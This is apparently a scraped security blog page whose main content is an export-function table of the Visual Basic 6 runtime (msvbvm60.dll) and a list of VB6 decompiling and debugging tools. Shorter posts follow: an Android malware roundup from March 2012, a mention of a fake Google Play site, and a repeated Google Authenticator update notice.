[C ] 451 (0x01C3) 343 (0x0157) __vbaVarAnd 0x00109589
[C ] 452 (0x01C4) 344 (0x0158) __vbaVarCat 0x000E697D
[C ] 453 (0x01C5) 345 (0x0159) __vbaVarCmpEq 0x00109922
[C ] 454 (0x01C6) 346 (0x015A) __vbaVarCmpGe 0x0010998C
[C ] 455 (0x01C7) 347 (0x015B) __vbaVarCmpGt 0x001099C1
[C ] 456 (0x01C8) 348 (0x015C) __vbaVarCmpLe 0x001099F6
[C ] 457 (0x01C9) 349 (0x015D) __vbaVarCmpLt 0x00109A2B
[C ] 458 (0x01CA) 350 (0x015E) __vbaVarCmpNe 0x00109957
[C ] 459 (0x01CB) 352 (0x0160) __vbaVarDateVar 0x000E0C9C
[C ] 460 (0x01CC) 353 (0x0161) __vbaVarDiv 0x00107689
[C ] 461 (0x01CD) 355 (0x0163) __vbaVarEqv 0x00109604
[C ] 462 (0x01CE) 356 (0x0164) __vbaVarErrI4 0x000E18F1
[C ] 463 (0x01CF) 357 (0x0165) __vbaVarFix 0x00107777
[C ] 464 (0x01D0) 358 (0x0166) __vbaVarForInit 0x001093CC
[C ] 465 (0x01D1) 359 (0x0167) __vbaVarForNext 0x001093FA
[C ] 466 (0x01D2) 360 (0x0168) __vbaVarIdiv 0x001076B2
[C ] 467 (0x01D3) 361 (0x0169) __vbaVarImp 0x0010962D
[C ] 468 (0x01D4) 362 (0x016A) __vbaVarIndexLoad 0x000DC43B
[C ] 469 (0x01D5) 363 (0x016B) __vbaVarIndexLoadRef 0x000DC457
[C ] 470 (0x01D6) 364 (0x016C) __vbaVarIndexLoadRefLock 0x000DC484
[C ] 471 (0x01D7) 365 (0x016D) __vbaVarIndexStore 0x000DC4B2
[C ] 472 (0x01D8) 366 (0x016E) __vbaVarIndexStoreObj 0x000DC4CD
[C ] 473 (0x01D9) 367 (0x016F) __vbaVarInt 0x0010779C
[C ] 474 (0x01DA) 373 (0x0175) __vbaVarLike 0x000E9542
[C ] 475 (0x01DB) 374 (0x0176) __vbaVarLikeVar 0x000E95E4
[C ] 476 (0x01DC) 375 (0x0177) __vbaVarMod 0x001076DB
[C ] 477 (0x01DD) 377 (0x0179) __vbaVarMul 0x00107660
[C ] 478 (0x01DE) 378 (0x017A) __vbaVarNeg 0x0010772D
[C ] 479 (0x01DF) 379 (0x017B) __vbaVarNot 0x00109564
[C ] 480 (0x01E0) 380 (0x017C) __vbaVarOr 0x001095B2
[C ] 481 (0x01E1) 381 (0x017D) __vbaVarPow 0x00107704
[C ] 482 (0x01E2) 382 (0x017E) __vbaVarSetObj 0x000DA01F
[C ] 483 (0x01E3) 383 (0x017F) __vbaVarSetObjAddref 0x000DA049
[C ] 484 (0x01E4) 384 (0x0180) __vbaVarSetUnk 0x000DA073
[C ] 485 (0x01E5) 385 (0x0181) __vbaVarSetUnkAddref 0x000DA09D
[C ] 486 (0x01E6) 386 (0x0182) __vbaVarSetVar 0x000DA0C7
[C ] 487 (0x01E7) 387 (0x0183) __vbaVarSetVarAddref 0x000DA0DD
[C ] 488 (0x01E8) 388 (0x0184) __vbaVarSub 0x001077EA
[C ] 489 (0x01E9) 389 (0x0185) __vbaVarTextCmpEq 0x00109A60
[C ] 490 (0x01EA) 390 (0x0186) __vbaVarTextCmpGe 0x00109ACA
[C ] 491 (0x01EB) 391 (0x0187) __vbaVarTextCmpGt 0x00109AFF
[C ] 492 (0x01EC) 392 (0x0188) __vbaVarTextCmpLe 0x00109B34
[C ] 493 (0x01ED) 393 (0x0189) __vbaVarTextCmpLt 0x00109B69
[C ] 494 (0x01EE) 394 (0x018A) __vbaVarTextCmpNe 0x00109A95
[C ] 495 (0x01EF) 395 (0x018B) __vbaVarTextLike 0x000E956C
[C ] 496 (0x01F0) 396 (0x018C) __vbaVarTextLikeVar 0x000E95FE
[C ] 497 (0x01F1) 397 (0x018D) __vbaVarTextTstEq 0x0010988C
[C ] 498 (0x01F2) 398 (0x018E) __vbaVarTextTstGe 0x001098BE
[C ] 499 (0x01F3) 399 (0x018F) __vbaVarTextTstGt 0x001098D7
[C ] 500 (0x01F4) 400 (0x0190) __vbaVarTextTstLe 0x001098F0
[C ] 501 (0x01F5) 401 (0x0191) __vbaVarTextTstLt 0x00109909
[C ] 502 (0x01F6) 402 (0x0192) __vbaVarTextTstNe 0x001098A5
[C ] 503 (0x01F7) 403 (0x0193) __vbaVarTstEq 0x001097F6
[C ] 504 (0x01F8) 404 (0x0194) __vbaVarTstGe 0x00109828
[C ] 505 (0x01F9) 405 (0x0195) __vbaVarTstGt 0x00109841
[C ] 506 (0x01FA) 406 (0x0196) __vbaVarTstLe 0x0010985A
[C ] 507 (0x01FB) 407 (0x0197) __vbaVarTstLt 0x00109873
[C ] 508 (0x01FC) 408 (0x0198) __vbaVarTstNe 0x0010980F
[C ] 509 (0x01FD) 410 (0x019A) __vbaVarXor 0x001095DB
[C ] 510 (0x01FE) 412 (0x019C) __vbaVargObj 0x00107350
[C ] 511 (0x01FF) 413 (0x019D) __vbaVargObjAddref 0x001073B8
[C ] 512 (0x0200) 550 (0x0226) rtcLeftBstr 0x000E6CE3
[C ] 513 (0x0201) 555 (0x022B) rtcLeftVar 0x000E6D36
[C ] 514 (0x0202) 588 (0x024C) rtcRightBstr 0x000E6DD8
[C ] 515 (0x0203) 593 (0x0251) rtcRightVar 0x000E6E3A
[C ] 516 (0x0204) 447 (0x01BF) rtcAnsiValueBstr 0x000E70B7
[C ] 517 (0x0205) 559 (0x022F) rtcLowerCaseBstr 0x000E7569
[C ] 518 (0x0206) 560 (0x0230) rtcLowerCaseVar 0x000E75A0
[C ] 519 (0x0207) 620 (0x026C) rtcTrimBstr 0x000E7601
[C ] 520 (0x0208) 621 (0x026D) rtcTrimVar 0x000E7621
[C ] 521 (0x0209) 553 (0x0229) rtcLeftTrimBstr 0x000E7834
[C ] 522 (0x020A) 554 (0x022A) rtcLeftTrimVar 0x000E7854
[C ] 523 (0x020B) 591 (0x024F) rtcRightTrimBstr 0x000E7A47
[C ] 524 (0x020C) 592 (0x0250) rtcRightTrimVar 0x000E7A67
[C ] 525 (0x020D) 608 (0x0260) rtcSpaceBstr 0x000E7DB9
[C ] 526 (0x020E) 609 (0x0261) rtcSpaceVar 0x000E7DFB
[C ] 527 (0x020F) 623 (0x026F) rtcUpperCaseBstr 0x000E7F8A
[C ] 528 (0x0210) 624 (0x0270) rtcUpperCaseVar 0x000E7FAA
[C ] 529 (0x0211) 549 (0x0225) rtcKillFiles 0x000D5D41
[C ] 530 (0x0212) 461 (0x01CD) rtcChangeDir 0x000D5C68
[C ] 531 (0x0213) 563 (0x0233) rtcMakeDir 0x000D5C89
[C ] 532 (0x0214) 585 (0x0249) rtcRemoveDir 0x000D5C9A
[C ] 533 (0x0215) 462 (0x01CE) rtcChangeDrive 0x000D64C7
[C ] 534 (0x0216) 452 (0x01C4) rtcBeep 0x000DC715
[C ] 535 (0x0217) 523 (0x020B) rtcGetTimer 0x000DC85D
[C ] 536 (0x0218) 614 (0x0266) rtcStrFromVar 0x000E07D5
[C ] 537 (0x0219) 453 (0x01C5) rtcBstrFromAnsi 0x000E0EBE
[C ] 538 (0x021A) 577 (0x0241) rtcPackDate 0x000D1978
[C ] 539 (0x021B) 578 (0x0242) rtcPackTime 0x000D19D8
[C ] 540 (0x021C) 506 (0x01FA) rtcGetDateValue 0x000D1A3E
[C ] 541 (0x021D) 521 (0x0209) rtcGetTimeValue 0x000D1AAD
[C ] 542 (0x021E) 508 (0x01FC) rtcGetDayOfMonth 0x000D1B9D
[C ] 543 (0x021F) 513 (0x0201) rtcGetHourOfDay 0x000D1C50
[C ] 544 (0x0220) 514 (0x0202) rtcGetMinuteOfHour 0x000D1C93
[C ] 545 (0x0221) 515 (0x0203) rtcGetMonthOfYear 0x000D1B5A
[C ] 546 (0x0222) 517 (0x0205) rtcGetPresentDate 0x000D1D19
[C ] 547 (0x0223) 518 (0x0206) rtcGetSecondOfMinute 0x000D1CD6
[C ] 548 (0x0224) 601 (0x0259) rtcSetDateVar 0x000D1DB1
[C ] 549 (0x0225) 600 (0x0258) rtcSetDateBstr 0x000D1DFB
[C ] 550 (0x0226) 604 (0x025C) rtcSetTimeVar 0x000D1FE7
[C ] 551 (0x0227) 603 (0x025B) rtcSetTimeBstr 0x000D203E
[C ] 552 (0x0228) 509 (0x01FD) rtcGetDayOfWeek 0x000D1BE0
[C ] 553 (0x0229) 524 (0x020C) rtcGetYear 0x000D1B17
[C ] 554 (0x022A) 493 (0x01ED) rtcFileReset 0x000D4156
[C ] 555 (0x022B) 487 (0x01E7) rtcFileAttributes 0x000D4203
[C ] 556 (0x022C) 540 (0x021C) rtcIsArray 0x000DC89D
[C ] 557 (0x022D) 541 (0x021D) rtcIsDate 0x000DC8B1
[C ] 558 (0x022E) 542 (0x021E) rtcIsEmpty 0x000DC988
[C ] 559 (0x022F) 543 (0x021F) rtcIsError 0x000DC99C
[C ] 560 (0x0230) 545 (0x0221) rtcIsNull 0x000DC9B4
[C ] 561 (0x0231) 546 (0x0222) rtcIsNumeric 0x000DC9CA
[C ] 562 (0x0232) 547 (0x0223) rtcIsObject 0x000DCAEE
[C ] 563 (0x0233) 633 (0x0279) rtcVarType 0x000DCB05
[C ] 564 (0x0234) 440 (0x01B8) rtDecFromVar 0x000E01FA
[C ] 565 (0x0235) 495 (0x01EF) rtcFileWidth 0x000D4199
[C ] 566 (0x0236) 537 (0x0219) rtcInputCount 0x000D3025
[C ] 567 (0x0237) 538 (0x021A) rtcInputCountVar 0x000D2FF7
[C ] 568 (0x0238) 494 (0x01EE) rtcFileSeek 0x000E544E
[C ] 569 (0x0239) 492 (0x01EC) rtcFileLocation 0x000E558A
[C ] 570 (0x023A) 491 (0x01EB) rtcFileLength 0x000E5618
[C ] 571 (0x023B) 481 (0x01E1) rtcEndOfFile 0x000D4332
[C ] 572 (0x023C) 525 (0x020D) rtcHexBstrFromVar 0x000E1290
[C ] 573 (0x023D) 526 (0x020E) rtcHexVarFromVar 0x000E1381
[C ] 574 (0x023E) 572 (0x023C) rtcOctBstrFromVar 0x000E13BB
[C ] 575 (0x023F) 573 (0x023D) rtcOctVarFromVar 0x000E14A3
[C ] 576 (0x0240) 488 (0x01E8) rtcFileCopy 0x000D5F0D
[C ] 577 (0x0241) 489 (0x01E9) rtcFileDateTime 0x000D612D
[C ] 578 (0x0242) 490 (0x01EA) rtcFileLen 0x000D61F8
[C ] 579 (0x0243) 511 (0x01FF) rtcGetFileAttr 0x000D6224
[C ] 580 (0x0244) 602 (0x025A) rtcSetFileAttr 0x000D624D
[C ] 581 (0x0245) 581 (0x0245) rtcR8ValFromBstr 0x000D325A
[C ] 582 (0x0246) 607 (0x025F) rtcSin 0x000DCB7F
[C ] 583 (0x0247) 468 (0x01D4) rtcCos 0x000DCBA8
[C ] 584 (0x0248) 619 (0x026B) rtcTan 0x000DCBD1
[C ] 585 (0x0249) 451 (0x01C3) rtcAtn 0x000DCC01
[C ] 586 (0x024A) 485 (0x01E5) rtcExp 0x000DCC0C
[C ] 587 (0x024B) 558 (0x022E) rtcLog 0x000DCC4D
[C ] 588 (0x024C) 587 (0x024B) rtcRgb 0x000DCC8D
[C ] 589 (0x024D) 580 (0x0244) rtcQBColor 0x000DCCE6
[C ] 590 (0x024E) 562 (0x0232) rtcMacId 0x000D4545
[C ] 591 (0x024F) 622 (0x026E) rtcTypeName 0x000DDEA0
[C ] 592 (0x0250) 544 (0x0220) rtcIsMissing 0x000DD6FD
[C ] 593 (0x0251) 582 (0x0246) rtcRandomNext 0x000DCD05
[C ] 594 (0x0252) 583 (0x0247) rtcRandomize 0x000DCD3A
[C ] 595 (0x0253) 569 (0x0239) rtcMsgBox 0x000DD132
[C ] 596 (0x0254) 534 (0x0216) rtcInputBox 0x000DD301
[C ] 597 (0x0255) 448 (0x01C0) rtcAppActivate 0x000DCE42
[C ] 598 (0x0256) 480 (0x01E0) rtcDoEvents 0x000CE0F7
[C ] 599 (0x0257) 598 (0x0256) rtcSendKeys 0x000CCFE4
[C ] 600 (0x0258) 606 (0x025E) rtcShell 0x000CCE69
[C ] 601 (0x0259) 450 (0x01C2) rtcArray 0x00103A13
[C ] 602 (0x025A) 415 (0x019F) __vbaVargUnk 0x00107420
[C ] 603 (0x025B) 416 (0x01A0) __vbaVargUnkAddref 0x00107482
[C ] 604 (0x025C) 421 (0x01A5) __vbaVerifyVarObj 0x000DA152
[C ] 605 (0x025D) 510 (0x01FE) rtcGetErl 0x000DC71E
[C ] 606 (0x025E) 616 (0x0268) rtcStringBstr 0x000E7E26
[C ] 607 (0x025F) 617 (0x0269) rtcStringVar 0x000E7F4D
[C ] 608 (0x0260) 625 (0x0271) rtcVarBstrFromAnsi 0x000E0F56
[C ] 609 (0x0261) 505 (0x01F9) rtcGetDateBstr 0x000D2349
[C ] 610 (0x0262) 507 (0x01FB) rtcGetDateVar 0x000D22B9
[C ] 611 (0x0263) 520 (0x0208) rtcGetTimeBstr 0x000D240B
[C ] 612 (0x0264) 522 (0x020A) rtcGetTimeVar 0x000D22FB
[C ] 613 (0x0265) 632 (0x0278) rtcVarStrFromVar 0x000E0944
[C ] 614 (0x0266) 611 (0x0263) rtcSqr 0x000DCC6E
[C ] 615 (0x0267) 527 (0x020F) rtcIMEStatus 0x000DD6E4
[C ] 616 (0x0268) 551 (0x0227) rtcLeftCharBstr 0x000E6D9A
[C ] 617 (0x0269) 552 (0x0228) rtcLeftCharVar 0x000E6DAD
[C ] 618 (0x026A) 589 (0x024D) rtcRightCharBstr 0x000E6E9E
[C ] 619 (0x026B) 590 (0x024E) rtcRightCharVar 0x000E6EB1
[C ] 620 (0x026C) 535 (0x0217) rtcInputCharCount 0x000D3118
[C ] 621 (0x026D) 536 (0x0218) rtcInputCharCountVar 0x000D30EA
[C ] 622 (0x026E) 612 (0x0264) rtcStrConvVar 0x000E8FBF
[C ] 623 (0x026F) 422 (0x01A6) __vbaWriteFile 0x000D50F3
[C ] 624 (0x0270) 512 (0x0200) rtcGetHostLCID 0x000CCDD0
[C ] 625 (0x0271) 469 (0x01D5) rtcCreateObject 0x000D973F
[C ] 626 (0x0272) 516 (0x0204) rtcGetObject 0x000D9CCA
[C ] 627 (0x0273) 449 (0x01C1) rtcAppleScript 0x000F6341
[C ] 628 (0x0274) 564 (0x0234) rtcMidBstr 0x000E6EDC
[C ] 629 (0x0275) 567 (0x0237) rtcMidVar 0x000E6F7B
[C ] 630 (0x0276) 531 (0x0213) rtcInStr 0x000E71C4
[C ] 631 (0x0277) 565 (0x0235) rtcMidCharBstr 0x000E6FE2
[C ] 632 (0x0278) 566 (0x0236) rtcMidCharVar 0x000E702F
[C ] 633 (0x0279) 532 (0x0214) rtcInStrChar 0x000E712F
[C ] 634 (0x027A) 438 (0x01B6) rtBstrFromErrVar 0x000E06A0
[C ] 635 (0x027B) 437 (0x01B5) rtBoolFromErrVar 0x000E0DAB
[C ] 636 (0x027C) 439 (0x01B7) rtCyFromErrVar 0x000E0426
[C ] 637 (0x027D) 441 (0x01B9) rtI2FromErrVar 0x000E0252
[C ] 638 (0x027E) 442 (0x01BA) rtI4FromErrVar 0x000E02C1
[C ] 639 (0x027F) 443 (0x01BB) rtR4FromErrVar 0x000E0320
[C ] 640 (0x0280) 444 (0x01BC) rtR8FromErrVar 0x000E038D
[C ] 641 (0x0281) 476 (0x01DC) rtcDateFromVar 0x000E0D3D
[C ] 642 (0x0282) 631 (0x0277) rtcVarFromVar 0x000E097E
[C ] 643 (0x0283) 459 (0x01CB) rtcCVErrFromVar 0x000E09BA
[C ] 644 (0x0284) 74 (0x004A) VarPtr 0x000DDE99
[C ] 645 (0x0285) 479 (0x01DF) rtcDir 0x000D53F7
[C ] 646 (0x0286) 472 (0x01D8) rtcCurrentDirBstr 0x000D535F
[C ] 647 (0x0287) 471 (0x01D7) rtcCurrentDir 0x000D52B6
[C ] 648 (0x0288) 502 (0x01F6) rtcFreeFile 0x000D4275
[C ] 649 (0x0289) 467 (0x01D3) rtcCompareBstr 0x000E7B12
[C ] 650 (0x028A) 457 (0x01C9) rtcBstrFromFormatVar 0x000F6348
[C ] 651 (0x028B) 456 (0x01C8) rtcBstrFromError 0x000DC75C
[C ] 652 (0x028C) 629 (0x0275) rtcVarFromError 0x000DC731
[C ] 653 (0x028D) 556 (0x022C) rtcLenCharVar 0x000E6BA0
[C ] 654 (0x028E) 557 (0x022D) rtcLenVar 0x000E6BC6
[C ] 655 (0x028F) 497 (0x01F1) rtcFixVar 0x000E09FC
[C ] 656 (0x0290) 446 (0x01BE) rtcAbsVar 0x000E0A4C
[C ] 657 (0x0291) 539 (0x021B) rtcIntVar 0x000E0A9C
[C ] 658 (0x0292) 605 (0x025D) rtcSgnVar 0x000E0AEC
[C ] 659 (0x0293) 423 (0x01A7) _adj_fdiv_m16i 0x000F0306
[C ] 660 (0x0294) 630 (0x0276) rtcVarFromFormatVar 0x000F642B
[C ] 661 (0x0295) 474 (0x01DA) rtcDateAdd 0x000D25A0
[C ] 662 (0x0296) 475 (0x01DB) rtcDateDiff 0x000D27DB
[C ] 663 (0x0297) 477 (0x01DD) rtcDatePart 0x000D2B0F
[C ] 664 (0x0298) 579 (0x0243) rtcPartition 0x000DD739
[C ] 665 (0x0299) 464 (0x01D0) rtcChoose 0x000DD9FD
[C ] 666 (0x029A) 483 (0x01E3) rtcEnvironVar 0x000DDB35
[C ] 667 (0x029B) 482 (0x01E2) rtcEnvironBstr 0x000DDB60
[C ] 668 (0x029C) 618 (0x026A) rtcSwitch 0x000DDD91
[C ] 669 (0x029D) 465 (0x01D1) rtcCommandBstr 0x0000A1BB
[C ] 670 (0x029E) 466 (0x01D2) rtcCommandVar 0x000DDE02
[C ] 671 (0x029F) 595 (0x0253) rtcSLN 0x000F65FF
[C ] 672 (0x02A0) 596 (0x0254) rtcSYD 0x000F6624
[C ] 673 (0x02A1) 473 (0x01D9) rtcDDB 0x000F667A
[C ] 674 (0x02A2) 528 (0x0210) rtcIPMT 0x000F67BA
[C ] 675 (0x02A3) 575 (0x023F) rtcPPMT 0x000F68A9
[C ] 676 (0x02A4) 574 (0x023E) rtcPMT 0x000F695D
[C ] 677 (0x02A5) 576 (0x0240) rtcPV 0x000F6A25
[C ] 678 (0x02A6) 486 (0x01E6) rtcFV 0x000F6AE0
[C ] 679 (0x02A7) 571 (0x023B) rtcNPer 0x000F6BAB
[C ] 680 (0x02A8) 584 (0x0248) rtcRate 0x000F6CCF
[C ] 681 (0x02A9) 530 (0x0212) rtcImmediateIf 0x000DDAE3
[C ] 682 (0x02AA) 529 (0x0211) rtcIRR 0x000F6ED6
[C ] 683 (0x02AB) 561 (0x0231) rtcMIRR 0x000F71C7
[C ] 684 (0x02AC) 570 (0x023A) rtcNPV 0x000F7361
[C ] 685 (0x02AD) 484 (0x01E4) rtcErrObj 0x000DEF7D
[C ] 686 (0x02AE) 445 (0x01BD) rtUI1FromErrVar 0x000E0DFE
[C ] 687 (0x02AF) 628 (0x0274) rtcVarDateFromVar 0x000E0D49
[C ] 688 (0x02B0) 424 (0x01A8) _adj_fdiv_m32 0x000F026E
[C ] 689 (0x02B1) 519 (0x0207) rtcGetSetting 0x000F753C
[C ] 690 (0x02B2) 597 (0x0255) rtcSaveSetting 0x000F76F2
[C ] 691 (0x02B3) 478 (0x01DE) rtcDeleteSetting 0x000F77AB
[C ] 692 (0x02B4) 503 (0x01F7) rtcGetAllSettings 0x000F7B37
[C ] 693 (0x02B5) 458 (0x01CA) rtcByteValueBstr 0x000E7096
[C ] 694 (0x02B6) 454 (0x01C6) rtcBstrFromByte 0x000E0E72
[C ] 695 (0x02B7) 626 (0x0272) rtcVarBstrFromByte 0x000E0E93
[C ] 696 (0x02B8) 463 (0x01CF) rtcCharValueBstr 0x000E710B
[C ] 697 (0x02B9) 455 (0x01C7) rtcBstrFromChar 0x000E0F81
[C ] 698 (0x02BA) 627 (0x0273) rtcVarBstrFromChar 0x000E0FC2
[C ] 699 (0x02BB) 599 (0x0257) rtcSetCurrentCalendar 0x000D2E89
[C ] 700 (0x02BC) 504 (0x01F8) rtcGetCurrentCalendar 0x000D2EB0
[C ] 701 (0x02BD) 425 (0x01A9) _adj_fdiv_m32i 0x000F033A
[C ] 702 (0x02BE) 500 (0x01F4) rtcFormatNumber 0x000F64A2
[C ] 703 (0x02BF) 498 (0x01F2) rtcFormatCurrency 0x000F653A
[C ] 704 (0x02C0) 501 (0x01F5) rtcFormatPercent 0x000F64EE
[C ] 705 (0x02C1) 499 (0x01F3) rtcFormatDateTime 0x000F645F
[C ] 706 (0x02C2) 634 (0x027A) rtcWeekdayName 0x000F6586
[C ] 707 (0x02C3) 568 (0x0238) rtcMonthName 0x000F65C4
[C ] 708 (0x02C4) 496 (0x01F0) rtcFilter 0x000F84A2
[C ] 709 (0x02C5) 533 (0x0215) rtcInStrRev 0x000F8299
[C ] 710 (0x02C6) 548 (0x0224) rtcJoin 0x000F8716
[C ] 711 (0x02C7) 610 (0x0262) rtcSplit 0x000F7DDB
[C ] 712 (0x02C8) 586 (0x024A) rtcReplace 0x000F89C4
[C ] 713 (0x02C9) 615 (0x0267) rtcStrReverse 0x000F8971
[C ] 714 (0x02CA) 594 (0x0252) rtcRound 0x000DE16C
[C ] 715 (0x02CB) 460 (0x01CC) rtcCallByName 0x000DE1B6
[C ] 716 (0x02CC) 470 (0x01D6) rtcCreateObject2 0x000D97D1
[C ] 717 (0x02CD) 613 (0x0265) rtcStrConvVar2 0x000E8FE9
[C ] 718 (0x02CE) 426 (0x01AA) _adj_fdiv_m64 0x000F02BA
[C ] 719 (0x02CF) 427 (0x01AB) _adj_fdiv_r 0x000EFDA9
[C ] 720 (0x02D0) 428 (0x01AC) _adj_fdivr_m16i 0x000F0406
[C ] 721 (0x02D1) 429 (0x01AD) _adj_fdivr_m32 0x000F036E
[C ] 722 (0x02D2) 430 (0x01AE) _adj_fdivr_m32i 0x000F043A
[C ] 723 (0x02D3) 431 (0x01AF) _adj_fdivr_m64 0x000F03BA
[C ] 724 (0x02D4) 432 (0x01B0) _adj_fpatan 0x000F09F6
[C ] 725 (0x02D5) 433 (0x01B1) _adj_fprem 0x000F0689
[C ] 726 (0x02D6) 434 (0x01B2) _adj_fprem1 0x000F0941
[C ] 727 (0x02D7) 435 (0x01B3) _adj_fptan 0x000F09F9
[C ] 728 (0x02D8) 436 (0x01B4) _allmul 0x000EEEED
[C ] 999 (0x03E7) 65 (0x0041) TipInvokeMethod2 0x000D8DD6
[C ] 1016 (0x03F8) 64 (0x0040) TipInvokeMethod 0x000D8EF6
[C ] 1024 (0x0400) 44 (0x002C) IID_IVbaHost 0x0002E640
[C ] 1025 (0x0401) 26 (0x001A) EbGetObjConnectionCounts 0x0000AB41
[C ] 2000 (0x07D0) 8 (0x0008) CreateIExprSrvObj 0x000EB2C7
[C ] 2010 (0x07DA) 27 (0x001B) EbGetVBAObject 0x000C946F
For more reference, I have also attached a copy of the symbol dump.
msvbvm60 symdmp.zip
Decompiling and Debugging
There are a lot of tools that can be used to decompile a Visual Basic 6.0 compiled COFF. You can go to http://www.woodmann.com/collaborative/tools/index.php/Category:Visual_Basic_Tools for the list of Visual Basic tools.
Decompilers:
- DoDi's Visual Basic 3/4 Decompiler
- RACEVB6
- VB Decompiler
- VBReFormer
- Whiskey Kon Tequilla VB P-Code Debugger
- P32Dasm
Debuggers:
Although, when debugging, I personally use IDA Pro IDC script found at http://www.hex-rays.com/products/ida/support/freefiles/vb.idc hand in hand with OllyDebug. I place breakpoints at every module or form entry points.
But to better understand a Visual Basic compiled executable or library, try creating and compiling from Visual Studio. From there, you will be able to easily understand how a VB program works. (Create a message box invoking program, release compile it, then debug the executable.)
From: thecyberdung site
Wednesday, 4 April 2012
Android Malware March 2012 Roundup
| Date | Name |
| Mar 14, 2012 | Faketoken |
| Mar 15, 2012 | Boxer |
| Mar 20, 2012 | Antammi |
| Mar 22, 2012 | TGLoader |
| Mar 29, 2012 | DKFBootKit |
Fake Google Play
This fake google play site serves a malicious file called, google_play.apk which tricks russian users into thinking that they are the legitimate site.
Google Authenticator updated
Google recently updated Google Authenticator to version 2.15.
What's in this version:
1. New entry for Google Play, same great app
2. Updated look and feel
3. "Scan barcode" and "Manually add account" options moved to Menu > Add account.
When your phone is not connected to any network, Google Authenticator can be used to generate a valid verification code.
The verification code generated is then used in Google's 2-step verification process when signing in from a new device or phone.
Please visit this site for more info.
[gallery]
What's in this version:
1. New entry for Google Play, same great app
2. Updated look and feel
3. "Scan barcode" and "Manually add account" options moved to Menu > Add account.
When your phone is not connected to any network, Google Authenticator can be used to generate a valid verification code.
The verification code generated is then used in Google's 2-step verification process when signing in from a new device or phone.
Please visit this site for more info.
[gallery]
Subscribe to:
Comments (Atom)